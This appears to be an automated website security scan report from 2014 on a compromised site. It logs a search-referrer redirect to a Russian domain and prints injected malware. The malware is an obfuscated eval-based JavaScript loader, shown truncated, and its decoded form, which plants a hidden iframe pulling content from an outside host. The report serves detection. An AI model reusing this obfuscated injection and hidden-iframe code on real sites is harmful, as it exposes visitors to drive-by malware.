Malicious/Suspicious Redirects
Request:
  URL: http://www.charliesheenhasonespeed.com/ (imitation of visitor from search engine)
  GET / HTTP/1.1
  Host: www.charliesheenhasonespeed.com
  Referer: http://www.google.com/search?q=redirect+check1
Server response:
  HTTP/1.1 301 Moved Permanently
  Connection: close
  Date: Mon, 22 Sep 2014 07:30:26 GMT
  Location: http://se-vau.ru/acu?11
  Server: Apache
  Vary: Accept-Encoding
  Content-Length: 231
  Content-Type: text/html; charset=iso-8859-1
Status: malicious
Scanned pages/files
Request | Server response | Status |
http://www.charliesheenhasonespeed.com/ | 200 OK Content-Length: 13726 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
if(window.document)aa=new RegExp('test','i').toString();aaa='/test/i';if(aa.indexOf(aaa)!==-1){ss='';s=String;ee='e';e=window[ee+'val'];t='y';}h=-2;n=[4.5,4.5,52.5,51,16,20,50,55.5,49.5,58.5,54.5,50.5,55,58,23,51.5,50.5,58,34.5,54,50.5,54.5,50.5,55,58,57.5,33,60.5,42,48.5,51.5,39,48.5,54.5,50.5,20,19.5,49,55.5,50,60.5,19.5,20.5,45.5,24,46.5,20.5,61.5,4.5,4.5,4.5,52.5,51,57,48.5,54.5,50.5,57,20,20.5,29.5,4.5,4.5,62.5,16,50.5,54,57.5,50.5,16,61.5,4.5,4.5,4.5,50,55.5,49.5,58.5,54.5,50.5,55,58,23,59
Decoded script:
if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe src='http://storylootybuz.com/main.php?page=6eb5b7677d651df4' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
    var f = document.createElement('iframe');
    f.setAttribute('src','http://storylootybuz.com/main.php?page=6eb5b7677d651df4');
    f.style.visibility='hidden';
    f.style.position='absolute';
    f.style.left='0';
    f.style.t
<iframe src='http://storylootybuz.com/main.php?page=6eb5b7677d651df4' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>
Antivirus reports:
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.5/jquery-ui.min.js | 200 OK Content-Length: 195762 Content-Type: text/javascript | clean |
http://www.charliesheenhasonespeed.com/js/jplayer.min.js | 200 OK Content-Length: 16498 Content-Type: application/javascript | clean |
http://www.charliesheenhasonespeed.com/js/modernizr-1.7.min.js | 200 OK Content-Length: 9021 Content-Type: application/javascript | clean |
http://www.charliesheenhasonespeed.com/js/jquery.custom.js | 200 OK Content-Length: 11976 Content-Type: application/javascript | clean |
http://widgets.fbshare.me/files/fbshare.js | 200 OK Content-Length: 1566 Content-Type: application/x-javascript | clean |
http://platform.twitter.com/widgets.js | 200 OK Content-Length: 100803 Content-Type: application/javascript | clean |
http://www.charliesheenhasonespeed.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Sep 2014 07:30:31 GMT Location: http://se-vau.ru/acu?11 Server: Apache Vary: Accept-Encoding Content-Length: 207 Content-Type: text/html; charset=iso-8859-1 | clean |
http://se-vau.ru/acu?11 | 500 Can't connect to se-vau.ru:80 (Bad hostname) Content-Length: 150 Content-Type: text/plain | clean |
http://se-vau.ru/test404page.js | 500 Can't connect to se-vau.ru:80 (Bad hostname) Content-Length: 150 Content-Type: text/plain | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=charliesheenhasonespeed.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://charliesheenhasonespeed.com/
Result: charliesheenhasonespeed.com is not infected or malware details are not published yet.